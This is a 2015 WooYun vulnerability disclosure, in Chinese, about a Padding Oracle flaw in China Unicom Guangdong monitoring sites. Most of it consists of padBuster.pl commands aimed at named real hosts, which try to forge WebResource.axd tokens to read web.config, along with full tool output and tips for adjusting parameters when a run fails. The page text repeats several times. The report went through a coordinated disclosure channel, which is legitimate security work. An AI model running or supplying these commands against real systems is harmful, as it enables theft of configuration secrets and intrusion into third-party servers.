中国联通某监控平台Padding Oracle Vulnerability信息泄露漏洞利用过程

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0106017

漏洞标题：中国联通某监控平台Padding Oracle Vulnerability信息泄露漏洞利用过程

漏洞作者：几何黑店

提交时间：2015-04-08 14:09

修复时间：2015-05-25 18:52

公开时间：2015-05-25 18:52

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-08：细节已通知厂商并且等待厂商处理中
2015-04-10：厂商已经确认，细节仅向厂商公开
2015-04-20：细节向核心白帽子及相关领域专家公开
2015-04-30：细节向普通白帽子公开
2015-05-10：细节向实习白帽子公开
2015-05-25：细节向公众公开

简要描述：

联通的漏洞是越来越多了

详细说明：

http://lar.unicomgd.com/

上次报过的洞
http://wooyun.org/bugs/wooyun-2015-099087
今天无聊翻了翻原来发过的洞,看还有没有可利用的,嘿,还真有
ASPX的,看到这个,我就眼前一亮,果然......
我们来看看源代码

祭出工具

padBuster.pl http://lar.unicomgd.com/WebResource.axd?d=rF9mcFBXRdOs0vsKIxd7PQ2 rF9mcFBXRdOs0vsKIxd7PQ2 16 -encoding 3 -plaintext "|||~/web.config"
+-------------------------------------------+
| PadBuster - v0.3                          |
| Brian Holyfield - Gotham Digital Science  |
| labs@gdssecurity.com                      |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 20794
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID#     Freq    Status  Length  Location
-------------------------------------------------------
1       1       500     5923    N/A
2 **    255     500     5925    N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (146) [Byte 16]
[+] Success: (147) [Byte 15]
[+] Success: (240) [Byte 14]
[+] Success: (125) [Byte 13]
[+] Success: (246) [Byte 12]
[+] Success: (165) [Byte 11]
[+] Success: (108) [Byte 10]
[+] Success: (23) [Byte 9]
[+] Success: (21) [Byte 8]
[+] Success: (84) [Byte 7]
[+] Success: (56) [Byte 6]
[+] Success: (224) [Byte 5]
[+] Success: (241) [Byte 4]
[+] Success: (161) [Byte 3]
[+] Success: (40) [Byte 2]
[+] Success: (246) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): 9a5bd382c3443b7e3108cc9d1f9af692
[+] Intermediate Bytes (HEX): e627affcec335e1c1f6ba3f379f39193
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: mlvTgsNEO34xCMydH5r2kgAAAAAAAAAAAAAAAAAAAAA1
-------------------------------------------------------

解出第一个密钥,那么最终的密钥也就不远了
第二步密钥

http://lar.unicomgd.com/ScriptResource.axd?d=-_O5kfEIAgFdMPGupyOWH5pb04LDRDt-MQjMnR-a9pIAAAAAAAAAAAAAAAAAAAAA0

很多人说遇到很多这种漏洞,但是跑不出来,以我的经验来看,WebResource.axd?d=后面的字符串越少越好跑出来,如果非常长,跑出来第一步密钥的几率比较小.
有时当我们碰到字符串比较长的,可以把16 -encoding 3 -plaintext "|||~/web.config" 中的3 改成其他的,比如:

-encoding [0-4]: Encoding Format of Sample (Default 0)
                  0=Base64, 1=Lower HEX, 2=Upper HEX
                  3=.NET UrlToken, 4=WebSafe Base64

当出现这个错误时

我们可以把16 -encoding 3 -plaintext "|||~/web.config"中的16改成图上提示的数字.

漏洞证明：

另外还有两个
http://a.unicomgd.com/
http://b.unicomgd.com/

padBuster.pl http://b.unicomgd.com/WebResource.axd?d=0Z76PrPlS9S1mTbXUM_z
q1EeJZK5v1hpHIarjgBsOKDz8UVvXS_FrmxDYqlAX3CedD0vtRtH3O5OAxQ-QwX8GL41uw41 0Z76PrP
lS9S1mTbXUM_zq1EeJZK5v1hpHIarjgBsOKDz8UVvXS_FrmxDYqlAX3CedD0vtRtH3O5OAxQ-QwX8GL4
1uw41 66 -encoding 0 -plaintext "|||~/web.config"
+-------------------------------------------+
| PadBuster - v0.3                          |
| Brian Holyfield - Gotham Digital Science  |
| labs@gdssecurity.com                      |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 20794
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID#     Freq    Status  Length  Location
-------------------------------------------------------
1       8       500     8827    N/A
2 **    248     500     8825    N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (255) [Byte 64]
[+] Success: (255) [Byte 63]
[+] Success: (255) [Byte 62]
[+] Success: (255) [Byte 61]
[+] Success: (255) [Byte 60]
[+] Success: (255) [Byte 59]
[+] Success: (255) [Byte 58]
[+] Success: (255) [Byte 57]
[+] Success: (255) [Byte 56]
[+] Success: (255) [Byte 55]
[+] Success: (255) [Byte 54]
[+] Success: (255) [Byte 53]
[+] Success: (255) [Byte 52]
[+] Success: (255) [Byte 51]
[+] Success: (255) [Byte 50]
[+] Success: (255) [Byte 49]
[+] Success: (255) [Byte 48]
[+] Success: (255) [Byte 47]
[+] Success: (255) [Byte 46]
[+] Success: (255) [Byte 45]
[+] Success: (255) [Byte 44]
[+] Success: (255) [Byte 43]
[+] Success: (255) [Byte 42]
[+] Success: (255) [Byte 41]
[+] Success: (255) [Byte 40]
[+] Success: (255) [Byte 39]
[+] Success: (255) [Byte 38]
[+] Success: (255) [Byte 37]
[+] Success: (255) [Byte 36]
[+] Success: (255) [Byte 35]
[+] Success: (255) [Byte 34]
[+] Success: (255) [Byte 33]
[+] Success: (255) [Byte 32]
[+] Success: (255) [Byte 31]
[+] Success: (255) [Byte 30]
[+] Success: (255) [Byte 29]
[+] Success: (255) [Byte 28]
[+] Success: (255) [Byte 27]
[+] Success: (255) [Byte 26]
[+] Success: (255) [Byte 25]
[+] Success: (255) [Byte 24]
[+] Success: (255) [Byte 23]
[+] Success: (255) [Byte 22]
[+] Success: (255) [Byte 21]
[+] Success: (255) [Byte 20]
[+] Success: (255) [Byte 19]
[+] Success: (255) [Byte 18]
[+] Success: (255) [Byte 17]
[+] Success: (255) [Byte 16]
[+] Success: (255) [Byte 15]
[+] Success: (255) [Byte 14]
[+] Success: (255) [Byte 13]
[+] Success: (255) [Byte 12]
[+] Success: (255) [Byte 11]
[+] Success: (255) [Byte 10]
[+] Success: (255) [Byte 9]
[+] Success: (255) [Byte 8]
[+] Success: (255) [Byte 7]
[+] Success: (255) [Byte 6]
[+] Success: (255) [Byte 5]
[+] Success: (255) [Byte 4]
[+] Success: (255) [Byte 3]
[+] Success: (255) [Byte 2]
[+] Success: (255) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): c3bcbdbcecb3a0a4e9aba6a4ada5aafffee1e0e3e2e5e4e7e6e9e
8ebeaedecefeed1d0d3d2d5d4d7d6d9d8dbdadddcdfdec1c0c3c2c5c4c7c6c9c8cbcacdcccf
[+] Intermediate Bytes (HEX): bfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7
d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfe
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: w7y9vOyzoKTpq6akraWq%2F%2F7h4OPi5eTn5uno6%2Brt7O%2Fu0dDT
0tXU19bZ2Nva3dzf3sHAw8LFxMfGycjLys3MzwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3D
-------------------------------------------------------

padBuster.pl http://a.unicomgd.com/WebResource.axd?d=yu_vV8xwAIAwLO27Y1AK
pzIXUt5GH41VdO_P9SEoF1Oi1m2S_pIUSIDbfqS2Hytam6SGX8Ccci--AT1U8BE0-t7YA1k1 yu_vV8x
wAIAwLO27Y1AKpzIXUt5GH41VdO_P9SEoF1Oi1m2S_pIUSIDbfqS2Hytam6SGX8Ccci--AT1U8BE0-t7
YA1k1 64 -encoding 0 -plaintext "|||~/web.config"
+-------------------------------------------+
| PadBuster - v0.3                          |
| Brian Holyfield - Gotham Digital Science  |
| labs@gdssecurity.com                      |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 20794
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID#     Freq    Status  Length  Location
-------------------------------------------------------
1       8       500     8827    N/A
2 **    248     500     8825    N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (255) [Byte 64]
[+] Success: (255) [Byte 63]
[+] Success: (255) [Byte 62]
[+] Success: (255) [Byte 61]
[+] Success: (255) [Byte 60]
[+] Success: (255) [Byte 59]
[+] Success: (255) [Byte 58]
[+] Success: (255) [Byte 57]
[+] Success: (255) [Byte 56]
[+] Success: (255) [Byte 55]
[+] Success: (255) [Byte 54]
[+] Success: (255) [Byte 53]
[+] Success: (255) [Byte 52]
[+] Success: (255) [Byte 51]
[+] Success: (255) [Byte 50]
[+] Success: (255) [Byte 49]
[+] Success: (255) [Byte 48]
[+] Success: (255) [Byte 47]
[+] Success: (255) [Byte 46]
[+] Success: (255) [Byte 45]
[+] Success: (255) [Byte 44]
[+] Success: (255) [Byte 43]
[+] Success: (255) [Byte 42]
[+] Success: (255) [Byte 41]
[+] Success: (255) [Byte 40]
[+] Success: (255) [Byte 39]
[+] Success: (255) [Byte 38]
[+] Success: (255) [Byte 37]
[+] Success: (255) [Byte 36]
[+] Success: (255) [Byte 35]
[+] Success: (255) [Byte 34]
[+] Success: (255) [Byte 33]
[+] Success: (255) [Byte 32]
[+] Success: (255) [Byte 31]
[+] Success: (255) [Byte 30]
[+] Success: (255) [Byte 29]
[+] Success: (255) [Byte 28]
[+] Success: (255) [Byte 27]
[+] Success: (255) [Byte 26]
[+] Success: (255) [Byte 25]
[+] Success: (255) [Byte 24]
[+] Success: (255) [Byte 23]
[+] Success: (255) [Byte 22]
[+] Success: (255) [Byte 21]
[+] Success: (255) [Byte 20]
[+] Success: (255) [Byte 19]
[+] Success: (255) [Byte 18]
[+] Success: (255) [Byte 17]
[+] Success: (255) [Byte 16]
[+] Success: (255) [Byte 15]
[+] Success: (255) [Byte 14]
[+] Success: (255) [Byte 13]
[+] Success: (255) [Byte 12]
[+] Success: (255) [Byte 11]
[+] Success: (255) [Byte 10]
[+] Success: (255) [Byte 9]
[+] Success: (255) [Byte 8]
[+] Success: (255) [Byte 7]
[+] Success: (255) [Byte 6]
[+] Success: (255) [Byte 5]
[+] Success: (255) [Byte 4]
[+] Success: (255) [Byte 3]
[+] Success: (255) [Byte 2]
[+] Success: (255) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): c3bcbdbcecb3a0a4e9aba6a4ada5aafffee1e0e3e2e5e4e7e6e9e
8ebeaedecefeed1d0d3d2d5d4d7d6d9d8dbdadddcdfdec1c0c3c2c5c4c7c6c9c8cbcacdcccf
[+] Intermediate Bytes (HEX): bfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7
d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfe
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: w7y9vOyzoKTpq6akraWq%2F%2F7h4OPi5eTn5uno6%2Brt7O%2Fu0dDT
0tXU19bZ2Nva3dzf3sHAw8LFxMfGycjLys3MzwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3D
-------------------------------------------------------

最终的密钥跑的太久了,就不跑了.

修复方案：

你懂的

版权声明：转载请注明来源几何黑店@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-04-10 18:51

厂商回复：

已经由CNVD通过网站公开联系方式（或以往建立的处置渠道）向网站管理单位（软件生产厂商）通报。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0106017

漏洞标题：中国联通某监控平台Padding Oracle Vulnerability信息泄露漏洞利用过程

相关厂商：中国联通

漏洞作者：几何黑店

提交时间：2015-04-08 14:09

修复时间：2015-05-25 18:52

公开时间：2015-05-25 18:52

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源几何黑店@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0106017

漏洞标题：中国联通某监控平台Padding Oracle Vulnerability信息泄露漏洞利用过程

相关厂商：中国联通

漏洞作者： 几何黑店

提交时间：2015-04-08 14:09

修复时间：2015-05-25 18:52

公开时间：2015-05-25 18:52

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0106017"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 几何黑店@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：几何黑店

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源几何黑店@乌云